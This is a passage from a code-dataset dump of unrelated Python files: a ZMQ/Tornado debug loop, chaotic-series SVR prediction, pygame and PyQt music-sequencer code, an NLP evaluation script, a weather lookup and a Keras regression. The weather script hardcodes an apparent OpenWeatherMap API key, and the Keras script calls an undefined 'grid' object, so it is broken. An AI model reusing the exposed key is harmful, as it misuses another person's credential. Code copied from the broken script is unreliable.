\tself.render(\"login.html\")\n","sub_path":"handlers/menu_handlers.py","file_name":"menu_handlers.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"457538302","text":"import sys\nimport traceback\nfrom zmq.eventloop import ioloop\nioloop.install()\n\n\ndef get_ioloop():\n from zmq.eventloop.ioloop import ZMQPoller\n from zmq.eventloop.ioloop import ZMQError, ETERM\n from tornado.ioloop import PollIOLoop\n\n class DebugPoller(ZMQPoller):\n def __init__(self):\n super(DebugPoller, self).__init__()\n self._fds = []\n\n def register(self, fd, events):\n if fd not in self._fds:\n self._fds.append(fd)\n return self._poller.register(fd, self._map_events(events))\n\n def modify(self, fd, events):\n if fd not in self._fds:\n self._fds.append(fd)\n return self._poller.modify(fd, self._map_events(events))\n\n def unregister(self, fd):\n if fd in self._fds:\n self._fds.remove(fd)\n return self._poller.unregister(fd)\n\n def poll(self, timeout):\n \"\"\"\n #737 - For some reason the poller issues events with\n unexistant FDs, usually with big ints. We have not found yet the\n reason of this\n behavior that happens only during the tests. But by filtering out\n those events, everything works fine.\n\n \"\"\"\n z_events = self._poller.poll(1000*timeout)\n return [(fd, self._remap_events(evt)) for fd, evt in z_events\n if fd in self._fds]\n\n class DebugLoop(PollIOLoop):\n def initialize(self, **kwargs):\n PollIOLoop.initialize(self, impl=DebugPoller(), **kwargs)\n\n def handle_callback_exception(self, callback):\n exc_type, exc_value, tb = sys.exc_info()\n traceback.print_tb(tb)\n raise exc_value\n\n @staticmethod\n def instance():\n PollIOLoop.configure(DebugLoop)\n return PollIOLoop.instance()\n\n def start(self):\n try:\n super(DebugLoop, self).start()\n except ZMQError as e:\n if e.errno == ETERM:\n # quietly return on ETERM\n pass\n else:\n raise e\n\n from tornado import ioloop\n ioloop.IOLoop.configure(DebugLoop)\n return ioloop.IOLoop()\n","sub_path":"loadsagent/tests/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"612479549","text":"import matplotlib as mpl\n\nmpl.use('TKAgg')\nimport matplotlib.pyplot as plt\nimport segypy\nimport numpy as np\nfrom numpy.matlib import repmat\nfrom scipy.integrate import odeint\nimport pypsr\nfrom sklearn.svm import SVR # 调用支持向量机的分类回归函数NuSVR(支持向量回归)\n\n\n'''求解混沌方程的微分方程'''\n# x''+a*x'-x+x^3=f*cos(t)--Duffing混沌序列\n\ndef Duffing(InitialValue, t, a, f):\n x, y = InitialValue\n dydt = [y, x - np.power(x, 3) - a * y + f * np.cos(t)]\n return dydt\n\n\ny0 = [0, 0] # 初值条件\n\nt = np.linspace(0, 299, 300)\nprint(t)\n\na = 0.25 # 阻尼系数\nf = 0.45 # 激励系数\n\nSol = odeint(Duffing, y0, t, args=(a, f)) # 解微分方程\n\nChaos = Sol[:, 0] # 混沌序列\nChaos = Chaos[:, np.newaxis]\n\nprint('混沌序列的大小:', np.shape(Chaos))\nprint('混沌序列数据类型:', type(Chaos))\n\n'''混沌序列作图'''\nplt.figure(1)\nplt.plot(t, Chaos, 'b', label='x(t)')\nplt.title('Chaos')\nplt.legend(loc='best')\nplt.xlabel('t')\nplt.grid()\n\n\n\n'''相空间重构'''\ndef PhaSpaRecon_multi(Chaos, tau, m):\n # 输入:Chaos=混度序列;tau=重构时延;m=嵌入维度\n # 输出:xn=相空间中的点序列(每一列为相空间中的一个点);dn=一步预测的目标\n\n Length = len(Chaos) # 将序列长度存储下来\n print('混沌序列的长度:', Length)\n ChaosNew = np.reshape(Chaos, (1, Length))\n print('改变Chaos的shape:', np.shape(ChaosNew))\n print('改变shape之后的Chaos:',ChaosNew)\n\n if Length - (m - 1) * tau < 1:\n print('delay time or the embedding dimension is too large')\n xn = []\n\n else:\n xn = np.empty((m, Length -(m - 1) * tau))\n print('预留的相空间的大小:', np.shape(xn))\n for i in range(m):\n xn[i, :] = ChaosNew[0, 1+(i+1) * tau-tau-1:Length -m*tau+(i+1)*tau]\n print('重构的序列:', np.transpose(xn))\n print('相空间的点序列大小:', np.shape(xn))\n return xn\n\ndef PhaSpaRecon_one(Chaos, tau, m):\n # 输入:Chaos=混度序列;tau=重构时延;m=嵌入维度\n # 输出:xn=相空间中的点序列(每一列为相空间中的一个点);dn=一步预测的目标\n\n Length = len(Chaos) # 将序列长度存储下来\n print('混沌序列的长度:', Length)\n ChaosNew = np.reshape(Chaos, (1, Length))\n print('改变Chaos的shape:', np.shape(ChaosNew))\n if Length - 1 - (m - 1) * tau < 1:\n print('delay time or the embedding dimension is too large')\n xn = []\n dn = []\n else:\n xn = np.empty((m, Length - 1 - (m - 1) * tau))\n print('预留的相空间的大小:', np.shape(xn))\n for i in range(m):\n xn[i, :] = ChaosNew[0, (i + 1 - 1) * tau:Length - 1 - (m - (i + 1)) * tau]\n print('重构的序列:', np.transpose(xn))\n print('相空间的点序列大小:', np.shape(xn))\n\n dn = ChaosNew[0, 1 + (m - 1) * tau:Length]\n\n print('The shape of dn:',np.shape(dn))\n # dnReshape=np.reshape(dn,(1,d_len))\n return xn, dn\n\n\n'''test'''\nNum_Train = 100 # 训练样本点数\nNum_Test = 100 # 测试样本点数\n\nChaosTrain = Chaos[:Num_Train, 0]\nChaosTrain = ChaosTrain[:, np.newaxis] # 训练样本\nprint(np.shape(ChaosTrain))\nprint('混沌序列:',np.transpose(ChaosTrain))\n\nChaosTest = Chaos[Num_Train:Num_Train + Num_Test, 0]\nChaosTest = ChaosTest[:, np.newaxis] # 测试样本\nprint(np.shape(ChaosTest))\n\n'''各种参数'''\nd=10 #嵌入维数\nt=7 #延迟时间\n\nXn_Tr, Dn_Tr = PhaSpaRecon_one(ChaosTrain, t, d) #对训练样本进行相空间重构\n\n\n\n''' Fit regression model '''\nsvr_rbf = SVR(C=1e3, cache_size=200, coef0=0.0, degree=3, epsilon=0.1, gamma='auto',\n kernel='rbf', max_iter=-1, shrinking=True, tol=0.001, verbose=False) # 核函数采用高斯径向基核函数(Radial Basis Function-RBF)\n\nNum_Pr=50 #对未来100个点进行预测\n\nX_st=Chaos[Num_Train-(d-1)*t-1:Num_Train]\nprint('混沌序列:',X_st)\n\nPredictResults_Pr=np.empty(Num_Pr)\n\n\n'''循环多步预测'''\nfor i in np.arange(Num_Pr):\n print('第',i+1,'步预测')\n XN_st=PhaSpaRecon_multi(X_st,t,d)\n PredictResults_Pr[i] = svr_rbf.fit(np.transpose(Xn_Tr), Dn_Tr).predict(np.transpose(XN_st)) #以训练样本的重构序列进行训练产生模型,进行预测\n print('单次测的值:',PredictResults_Pr[i],type(PredictResults_Pr[i]))\n List_X_st=X_st[1:,0].tolist() #将预测出的值添加到混沌序列的末尾,参加下次重构\n List_X_st.append(PredictResults_Pr[i])\n X_st=np.array(List_X_st)\n X_st=np.reshape(X_st,(len(X_st),1))\n print(X_st)\n\nPredictTarget=Chaos[Num_Train:Num_Train+Num_Pr] #预测目标\n\n'''预测误差'''\nError_pr=np.transpose(PredictTarget)-PredictResults_Pr\n'''预测结果作图'''\nplt.figure(4)\nplt.plot(np.transpose(PredictResults_Pr), 'b', label='Pre_Pr(t)')\nplt.legend(loc='best')\nplt.title('Predict results')\nplt.xlabel('t')\nplt.grid()\n\n'''训练样本预测结果与原始序列对比'''\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\nplt.figure(5)\nplt.subplot(2, 1, 1) # 预测结果与真实值曲线对比\nplt.plot(PredictTarget, '-b', label='Original')\nplt.plot(np.transpose(PredictResults_Pr), '--r', label='Predict')\nplt.legend(loc='lower right')\nplt.xlabel('t')\nplt.title('训练样本真实值(.)与预测值(-)')\n\nplt.subplot(2, 1, 2) # 预测误差曲线\nplt.plot(np.transpose(Error_pr), 'b', label='Error')\nplt.legend(loc='best')\nplt.title('预测误差曲线')\nplt.xlabel('t')\nplt.grid()\nplt.show()","sub_path":"seismic data in ML/Multi-predict-Duffing.py","file_name":"Multi-predict-Duffing.py","file_ext":"py","file_size_in_byte":5571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"108030301","text":"#Water.py\nimport pygame\n\nclass Earth(pygame.sprite.Sprite):\n def __init__(self, initial_position):\n pygame.sprite.Sprite.__init__(self)\n image = pygame.image.load(\"images/earth_40x10.jpg\")\n image = image.convert()\n self.image, self.rect = image, image.get_rect()\n self.rect.topleft = initial_position\n\n def draw(self, window_surface):\n window_surface.blit(self.image, self.rect)\t\n","sub_path":"code/RLTankAttack/v2__array_version/Earth.py","file_name":"Earth.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"122366028","text":"import sys, time, random\nfrom time import sleep, perf_counter\nimport json\nimport os.path\nimport gc\nimport glob\nimport random\nimport soundfile as sf\nimport contextlib\n\nwith contextlib.redirect_stdout(None):\n import pygame\n\nfrom time import time, sleep\nfrom datetime import datetime\nfrom os import path\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic\nfrom PyQt5.QtCore import Qt\n\nfrom waveform import Waveform\n\nfrom threading import Thread\n\n# ram stores\n\n_sound_library = {}\n\n# config\n\nCONFIG = {\n 'app_name': 'bg @ 0.1',\n 'window_width': 500,\n 'window_height': 400,\n 'channel_num': 4,\n 'store_dir': 'data/',\n 'waveforms_dir': 'waveforms/',\n 'samples_dir': 'samples/',\n 'library_dir': 'library/'\n}\n\n# helper\n\ndef log(msg):\n print('%s: %s' % (datetime.utcnow().strftime('%M:%S.%f')[:-4], msg))\n\ndef get_state():\n if path.exists(CONFIG['store_dir'] + '/state.json'):\n with open(CONFIG['store_dir'] + '/state.json') as json_file:\n return json.load(json_file)\n else:\n return {\n 'bpm': 120,\n 'bars': 1\n }\n\ndef set_state(state):\n with open(CONFIG['store_dir'] + '/state.json', 'w') as outfile:\n return json.dump(state, outfile)\n\ndef quit_app():\n print('quit')\n\ndef load_samples():\n count = len(glob.glob(CONFIG['samples_dir'] + '/*.wav'))\n\n log('loading %s samples' % count)\n\n for filename in glob.glob(CONFIG['samples_dir'] + '/*.wav'):\n log('loading %s' % filename)\n\n lib_filename = filename.replace(CONFIG['samples_dir'], CONFIG['library_dir'])\n\n if not path.exists(lib_filename):\n log('converting %s' % filename)\n\n data, samplerate = sf.read(filename)\n sf.write(lib_filename, data, 44100, subtype='PCM_16')\n\n for filename in glob.glob(CONFIG['library_dir'] + '/*.wav'):\n sound = pygame.mixer.Sound(filename)\n _sound_library[os.path.basename(filename)] = sound\n\n wv_filename = filename.replace(\n CONFIG['library_dir'],\n CONFIG['waveforms_dir']\n ).replace('.wav', '.gif')\n\n if not path.exists(wv_filename):\n log('creating waveform for %s' % filename)\n\n waveform = Waveform(filename)\n waveform.save(wv_filename)\n\n# audio channel init\n\nwith contextlib.redirect_stdout(None):\n pygame.mixer.pre_init(44100, -16, 2, 256)\n pygame.mixer.init()\n pygame.init()\n\nCHANNELS = []\n\nfor i in range(0, CONFIG['channel_num']):\n CHANNELS.append(pygame.mixer.Channel(i))\n\n# recover state\n\nSTATE = get_state()\n\nSTATE['current_step'] = 0\nSTATE['bpm'] = 122\n\nSTATE['tracks'] = [\n {'channel': 0, 'stutter': False, 'volume': 1, 'sample_id': 'dt_synth_122_sing_G#m.wav', 'grid': [0]},\n {'channel': 1, 'stutter': True, 'volume': 1, 'sample_id': 'kick.wav', 'grid': [0,4,8,12]},\n {'channel': 2, 'stutter': True, 'volume': 1, 'sample_id': 'hat-2.wav', 'grid': [0,2,4,8,10,11,12]},\n {'channel': 3, 'stutter': True, 'volume': 1, 'sample_id': 'hat-3.wav', 'grid': [0,2,4,8,10,11,12]},\n]\n\n# print(CHANNELS[0])\n\nset_state(STATE)\n\n# hey!\n\nwindow = {}\n\nlog('hey!')\n\n# load library\n\nload_samples()\n\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n\n # self.actionExit.setShortcutContext(QtCore.Qt.ApplicationShortcut)\n self.shortcut = QShortcut(QKeySequence(\"ESCAPE\"), self)\n self.shortcut.activated.connect(self.on_quit)\n\n self.shortcut = QShortcut(QKeySequence(\"Ctrl+Q\"), self)\n self.shortcut.activated.connect(self.on_quit)\n\n self.window_width = CONFIG['window_width']\n self.window_height = CONFIG['window_height']\n\n self.tracks_padding_left = 20\n self.tracks_padding_right = 20\n\n self.label = QtWidgets.QLabel()\n canvas = QtGui.QPixmap(self.window_width, self.window_height)\n\n self.setWindowTitle(CONFIG['app_name'])\n self.setFixedSize(self.window_width, self.window_height)\n\n self.label.setPixmap(canvas)\n self.setCentralWidget(self.label)\n self.draw()\n\n self.btn = QPushButton(\"play\", self)\n # self.btn.clicked.connect(self.draw())\n self.btn.move(10, 10)\n\n # self.timer = QtCore.QTimer()\n # self.timer.timeout.connect(self.draw)\n # self.timer.start(70)\n\n def on_quit(self):\n STATE['do_quit'] = True\n exit()\n\n def draw(self):\n p = QtGui.QPainter(self.label.pixmap())\n\n p.fillRect(self.rect(), QColor(0, 0, 0, 190))\n\n def draw_tracks(p):\n tracks_width = (self.window_width - (self.tracks_padding_left + self.tracks_padding_right))\n\n steps = 16 * STATE['bars']\n\n track_cell_height = 90\n track_cell_width = tracks_width / steps\n\n y = 0\n for track in STATE['tracks']:\n for step in range(0, (16 * STATE['bars'])):\n # p.setBrush(QBrush(Qt.green, Qt.DiagCrossPattern))\n # p.drawRect(self.tracks_padding_left+(step*track_cell_width), y*track_cell_height, track_cell_width,track_cell_height)\n\n # waveform_path = track['sample_id'].replace(\n # CONFIG['samples_dir'],\n # CONFIG['waveforms_dir']\n # ).replace('.wav', '.gif')\n\n # print(waveform_path)\n\n ahead = 0\n\n for n in range(step, (16 * STATE['bars'])):\n if n not in track['grid']:\n ahead = ahead + 1\n else:\n break\n\n if step in track['grid']:\n p.drawImage(\n QtCore.QRect(\n self.tracks_padding_left+((step+ahead)*track_cell_width),\n y*track_cell_height,\n track_cell_height,\n track_cell_width\n ),\n QtGui.QImage('%s/%s' % (CONFIG['waveforms_dir'], track['sample_id'].replace('.wav', '.gif')))\n )\n y = y + 1\n\n # y = 0\n # for n in range(0,4):\n # for x in range(0,8):\n # p.drawRect(y, st, 400,200)\n # p.drawImage(\n # QtCore.QRect(x*width, y, width, width),\n # QtGui.QImage(\"waveforms/Abletunes TSD Snare 27.gif\")\n # )\n # y = y + width\n\n def draw_cursor(p):\n pen = QPen(Qt.white, 3)\n p.setPen(pen)\n\n steps = 16 * STATE['bars']\n \n tracks_width = (self.window_width - (self.tracks_padding_left + self.tracks_padding_right))\n\n x = (tracks_width/steps) * STATE['current_step']\n\n p.drawLine(\n x,\n 0,\n x,\n self.window_height\n )\n\n def draw_text(p):\n p.drawText(\n random.randint(0,100),\n random.randint(0,100),\n str(STATE['bpm'])\n )\n\n draw_tracks(p)\n draw_cursor(p)\n draw_text(p)\n\n p.end()\n\n self.update()\n\ndef update_window():\n if window:\n window.draw()\n\ndef audioManager():\n def shuffle_track(TRACK):\n inc = random.randint(1,8)\n grid = []\n step = 0\n\n while step <= max_steps:\n grid.append(step)\n step = step + inc\n\n TRACK['grid'] = grid\n\n def play(channel, sample_id):\n if sample_id in _sound_library:\n channel.play(_sound_library[sample_id])\n\n delay = d = 60 / 120\n print(60 / delay, 'bpm')\n prev = perf_counter()\n\n # for i in range(20):\n \n\n DELTA = (60/(STATE['bpm'] * 4))\n GOAL = time()\n\n max_steps = 16 * STATE['bars']\n step = STATE['current_step']\n\n while True:\n if step >= max_steps:\n step = 0\n\n update_window()\n\n STATE['current_step'] = step\n\n play_output = []\n\n if 'do_quit' in STATE and STATE['do_quit']:\n exit()\n\n for TRACK in STATE['tracks']:\n channel = CHANNELS[TRACK['channel']]\n sample_id = TRACK['sample_id']\n\n if 'volume' in TRACK:\n channel.set_volume(TRACK['volume'])\n\n if 'stutter' in TRACK and TRACK['stutter']:\n channel.set_volume(random.randint(80,100)/100)\n\n if 'sample_id' in TRACK and 'grid' in TRACK and TRACK['sample_id']:\n if step in TRACK['grid']:\n if channel.get_busy():\n channel.stop()\n\n play(channel, TRACK['sample_id'])\n play_output.append('[%s]' % TRACK['sample_id'][0:6])\n\n log('playing %s' % (' '.join(play_output)))\n\n # print('%s/%s %s' % (step, max_steps, ))\n\n if step % 8 == 0 and random.randint(0,100) > 40:\n random_track = random.choice(STATE['tracks'])\n shuffle_track(random_track)\n\n step = step + 1\n\n sleep(d)\n t = perf_counter()\n delta = t - prev - delay\n print('{:+.9f}'.format(delta))\n d -= delta\n prev = t\n\n # GOAL += DELTA\n\n # gc.collect()\n\n # sleepInterval = GOAL - time()\n\n # if sleepInterval >= 0:\n # sleep(sleepInterval)\n # else:\n # sleep(0)\n\nif __name__ == '__main__':\n Thread(target = audioManager).start()\n\n # app = QtWidgets.QApplication(sys.argv)\n \n # window = MainWindow()\n # window.show()\n # app.exec_()\n\n\n","sub_path":"archive/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"8257904","text":"import sys\nimport os, argparse\nimport annotate_desc\nfrom collections import defaultdict\n\npath = sys.path[0]\nos.chdir(path)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-src', help='src-test file')\nparser.add_argument('-tgt', help='tgt-test file')\nparser.add_argument('-res', help='result file')\nargs = parser.parse_args()\n\nground_truth_lis_all = []\nwith open(args.tgt,'r') as file:\n lines = file.readlines()\nfor line in lines:\n line = line.strip()\n sent = annotate_desc.TypeDesc(line)\n sent.find_heads_id()\n words = sent.words\n head_ids = sent.hed_ids\n heads = [ words[i] for i in head_ids ]\n ground_truth_lis_all.append( heads )\n\nsub_is_list_all = []\nlength = len(ground_truth_lis_all)\nwith open(args.src,'r') as file:\n lines = file.readlines()\nfor line in lines:\n line = line.strip()\n triples = line.split(' ')\n lis = []\n for triple in triples:\n if 'instance_of' in triple:\n val, _, _ = triple.split(u'│')\n lis.append(val)\n if 'subclass_of' in triple:\n val, _, _ = triple.split(u'│')\n lis.append(val)\n lis = list(set(lis))\n sub_is_list_all.append(lis)\n\n\nall_num = 0\ncorrect_num = 0\nwith open(args.res,'r') as file: #change\n lines = file.readlines()\ni = 0\nfor line in lines:\n line = line.strip()\n if line == '':\n i += 1\n continue\n sent = annotate_desc.TypeDesc(line)\n sent.find_heads_id()\n words = sent.words\n head_ids = sent.hed_ids\n heads = [ words[i] for i in head_ids ]\n\n all_num += len(heads)\n\n gt_lis = ground_truth_lis_all[i]\n si_lis = sub_is_list_all[i]\n for head in heads:\n if head in gt_lis or head in si_lis:\n #print (head, gt_lis, si_lis)\n correct_num += 1\n else:\n #print (head, gt_lis, si_lis)\n pass\n i += 1\n\nprint (correct_num/all_num)\n#java -mx4g -cp \"*\" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port 9000\n#ps -ef | grep java | grep -v grep | awk '{print $2}' | sudo xargs kill -9","sub_path":"eval/hedacc.py","file_name":"hedacc.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"316851356","text":"import pyowm\n\n\ndef main():\n \"\"\"\n Gets temperature of 'city_name' in 'celsius' using the 'api_key', only for python 3.X.\n :return: Float value, using \"\"Degrees\"\" character.\n \"\"\"\n try:\n api_key = \"b5bcf5fa41abed55ddf71ea40aa6f4ea\"\n city_name = \"Artur Nogueira,BR\"\n # city_name = \"Campinas,BR\"\n\n owm = pyowm.OWM(api_key)\n weather_at_place = owm.weather_at_place(city_name)\n get_temp_celsius = weather_at_place.get_weather().get_temperature(\"celsius\")\n # format == {'temp_max': 10.5, 'temp': 9.7, 'temp_min': 9.0}\n weather_int_value = get_temp_celsius['temp']\n print(\"%s: %.1f°C\" % (city_name, weather_int_value))\n # return \"%s: %.1f°C\" % (city_name, weather_int_value)\n except:\n print(\"ERROR!\")\n # return \"ERROR!\"\n\n\nif __name__ == '__main__':\n main()\n","sub_path":".scripts/statusbar/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"241531885","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 9 18:59:49 2018\n\n@author: louk\n\"\"\"\n\nimport scipy.io as sio\nimport pandas as pd\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Conv2D, MaxPooling2D\nfrom keras.wrappers.scikit_learn import KerasRegressor\nfrom keras import regularizers\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import KFold,StratifiedKFold\nfrom sklearn.model_selection import cross_val_score,cross_val_predict\n\nimport pickle\nfrom scipy.signal import decimate\nseed=7\ntr_result={}\ntst_result={}\n\ndataset='ekl_tensordata_for_louk.mat'\nmat_contents=sio.loadmat(dataset)\nX=mat_contents['mmec_tnsr_fqm_forcomparison']\nX=decimate(X,8,axis=1)\nY=mat_contents['mmec_subj_infoMAT']\nnsubj=X.shape[2]\n\nfor subj_idx in range( 0 , 50 ) : #loop over subjects\n print('Subject ' + str(subj_idx) + '\\n')\n no_features=X.shape[0]*X.shape[1]\n tst_idx=subj_idx\n trn_idx=np.r_[0:subj_idx, subj_idx+1:nsubj]\n \n Xdense=X.reshape(no_features,nsubj)\n Xdense=Xdense.transpose() \n scaler=StandardScaler()\n scaler.fit(Xdense[trn_idx,:])\n Xdense=scaler.transform(Xdense)\n #Xcnn=X.transpose(2, 0, 1) # transpose such that examples are 1st\n\n age=Y[:,0]\n \n def generate_model():\n model = Sequential()\n # if ntype==1:\n model.add(Dense(round(no_features), input_dim=no_features, kernel_regularizer=regularizers.l2(l2_penalty), activation='relu')) # last layer should be linear so that we can have negative values as well\n model.add(Dropout(dropout_rate))\n model.add(Dense(round(no_features/2), kernel_regularizer=regularizers.l2(l2_penalty), activation='relu')) # last layer should be linear so that we can have negative values as well\n model.add(Dropout(dropout_rate)) \n model.add(Dense(round(no_features/2), kernel_regularizer=regularizers.l2(l2_penalty), activation='relu')) # last layer should be linear so that we can have negative values as well\n model.add(Dropout(dropout_rate)) \n model.add(Dense(round(no_features/4), kernel_regularizer=regularizers.l2(l2_penalty), activation='relu')) # last layer should be linear so that we can have negative values as well\n model.add(Dropout(dropout_rate)) \n model.add(Dense(1, kernel_regularizer=regularizers.l2(l2_penalty), activation='linear')) # last layer should be linear so that we can have negative values as well\n\n model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mse']) #mse for regression\n return model\n \n l2_penalty=[10]\n ntype=[1]\n dropout_rate = [0.0]\n estimator=KerasRegressor(build_fn=generate_model, epochs=1000, batch_size=10 , verbose=1)\n\n # param_grid = dict(no_features=[no_features],l2_penalty=l2_penalty, type=type, dropout_rate=dropout_rate)\n# grid = None;\n# grid = GridSearchCV( estimator=estimator, param_grid=param_grid, cv=2 , scoring='mean_squared_error')\n# grid = grid.fit(Xdense[trn_idx,:], age[trn_idx])\n n_folds=10;\n kfold = KFold(n_splits=n_folds, shuffle=True, random_state=seed)\n y_pred = cross_val_predict(estimator,Xdense[trn_idx,:],age[trn_idx],cv=kfold) \n tr_result[subj_idx]=grid.predict(Xdense[trn_idx,:])\n tst_result[subj_idx]=grid.predict(np.reshape(Xdense[tst_idx,:],(1,no_features)))\n \n# with open('file.txt', 'w') as file:\n# file.write(str(tr_result))\n with open('file.txt', 'w') as file:\n file.write(str(tst_result))\n \n","sub_path":"score_regression.py","file_name":"score_regression.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"161348946","text":"import sys\n\ndef input_parser(input_path):\n with open(input_path, 'r') as f:\n c = int(f.readline())\n for case in range(c):\n strs = f.readline().strip()\n yield case, (strs,)\n\ndef get_output_path(input_path):\n return input_path[:-2] + \"out\"\n\ndef output(f, s):\n print(s)\n f.write(s + \"\\n\")\n\ndef merge_pancakes(pan):\n simple_pan = []\n last = None\n for char in pan:\n if char == last:\n continue\n simple_pan.append(char)\n last = char\n return simple_pan\n\ndef problem(pan):\n pan = merge_pancakes(pan)\n if pan[-1] == '+':\n del pan[-1]\n return len(pan)\n\ndef main():\n input_path = sys.argv[1]\n with open(get_output_path(input_path), 'w') as g:\n for case, data in input_parser(input_path):\n out = problem(*data)\n output(g, \"Case #{}: {}\".format(case+1, out))\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"codes/CodeJamCrawler/16_0_2/quimcastella/revenge_pancakes.py","file_name":"revenge_pancakes.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"446702977","text":"#!/usr/bin/env python3\n\nimport rospy\nimport message_filters\n\nimport numpy as np\nimport time\n\nfrom gazebo_msgs.msg import ModelStates\nfrom std_msgs.msg import Float64MultiArray , Float64\n\nclass time_count(object):\n\n def __init__(self):\n\n rospy.init_node(\"time_count\",anonymous=True)\n\n pos = message_filters.Subscriber(\"/gazebo/model_states\",ModelStates)\n goal_state = message_filters.Subscriber(\"/goal_state\",Float64MultiArray)\n\n ms_fil = message_filters.ApproximateTimeSynchronizer([pos,goal_state],10,0.5,allow_headerless=True)\n\n ms_fil.registerCallback(self.callback)\n\n self.pub = rospy.Publisher(\"/time_count/time\",Float64,queue_size=10)\n\n self.on_pos_x = False\n self.on_pos_y = False\n self.on_pos_z = False\n\n self.start_time = None\n\n self.elips = 0\n\n def callback(self,pos,goal_state):\n\n index_pos = pos.name.index(\"quadrotor\")\n pose = pos.pose[index_pos].position\n pose = np.array([pose.x,pose.y,pose.z])\n goal = np.array(goal_state.data)\n\n self.dif = abs(goal - pose)\n\n print(\"pose : \",pose)\n print(\"goal : \",goal)\n\n self.time_count()\n\n def time_count(self):\n\n print((self.dif <= 0.1).all())\n\n if (self.dif <= 0.1).all():\n\n if self.start_time is None:\n\n self.start_time = time.time()\n self.elips = 0\n \n elif not self.start_time is None:\n\n self.elips = time.time() - self.start_time\n # self.start_time = None\n\n self.pub.publish(Float64(self.elips))\n\n else:\n\n self.start_time = None\n\n\nif __name__ == \"__main__\":\n\n timee = time_count()\n\n rospy.spin()","sub_path":"ros/quadrotor/src/quad_sim/script/time_count.py","file_name":"time_count.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"231357073","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nShowcases optical phenomenons plotting examples.\n\"\"\"\n\nfrom colour.phenomenons import rayleigh_scattering_spd\nfrom colour.plotting import * # noqa\nfrom colour.utilities.verbose import message_box\n\nmessage_box('Optical Phenomenons Plots')\n\nmessage_box(('Plotting a single \"Rayleigh Scattering\" spectral power '\n 'distribution.'))\nsingle_rayleigh_scattering_spd_plot()\n\nprint('\\n')\n\nmessage_box(('Comparing multiple \"Rayleigh Scattering\" spectral power '\n 'distributions with different CO_2 concentrations.'))\nname_template = 'Rayleigh Scattering - CO2: {0} ppm'\nrayleigh_spds = []\nfor ppm in (0, 50, 300):\n rayleigh_spd = rayleigh_scattering_spd(CO2_concentration=ppm)\n rayleigh_spd.name = name_template.format(ppm)\n rayleigh_spds.append(rayleigh_spd)\nmulti_spd_plot(rayleigh_spds,\n title=('Rayleigh Optical Depth - '\n 'Comparing \"C02\" Concentration Influence'),\n y_label='Optical Depth',\n legend_location='upper right')\n\nprint('\\n')\n\nmessage_box('Plotting \"The blue Sky\".')\nthe_blue_sky_plot()\n","sub_path":"colour/examples/plotting/examples_phenomenon_plots.py","file_name":"examples_phenomenon_plots.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"445716969","text":"'''\nAuthors\n - C. Selmi: written in 2020\n'''\nimport unittest\nimport numpy as np\n\nclass TestCalc(unittest.TestCase):\n\n def setUp(self):\n from m4.configuration import start\n self.ott, self._interf = start.create_ott()\n from m4.utils.optical_calibration import OpticalCalibration\n self.cal = OpticalCalibration(self.ott, self._interf)\n\n def tearDown(self):\n del(self.cal, self.ott)\n\n @unittest.skip('Salvataggio e lettura dati')\n def testCalibration(self):\n old_or_new = 1\n command_amp_vector = np.ones(5)\n n_push_pull = 1\n n_frames = 1\n mask_index = 4 #4 per il simulatore\n tt = self.cal.measureCalibrationMatrix(0, command_amp_vector,\n n_push_pull, n_frames, old_or_new)\n int_mat, rec = self.cal.analyzerCalibrationMeasurement(tt,\n mask_index)\n","sub_path":"test/test_calibration.py","file_name":"test_calibration.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"126231576","text":"#!/usr/bin/python\n###############################################################################\n# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. #\n# #\n# Licensed under the Apache License Version 2.0 (the \"License\"). You may not #\n# use this file except in compliance with the License. A copy of the License #\n# is located at #\n# #\n# http://www.apache.org/licenses/ #\n# #\n# or in the \"license\" file accompanying this file. This file is distributed #\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express #\n# or implied. See the License for the specific language governing permis- #\n# sions and limitations under the License. #\n###############################################################################\n\n\"\"\"\nSimple test to validate that the request format coming from 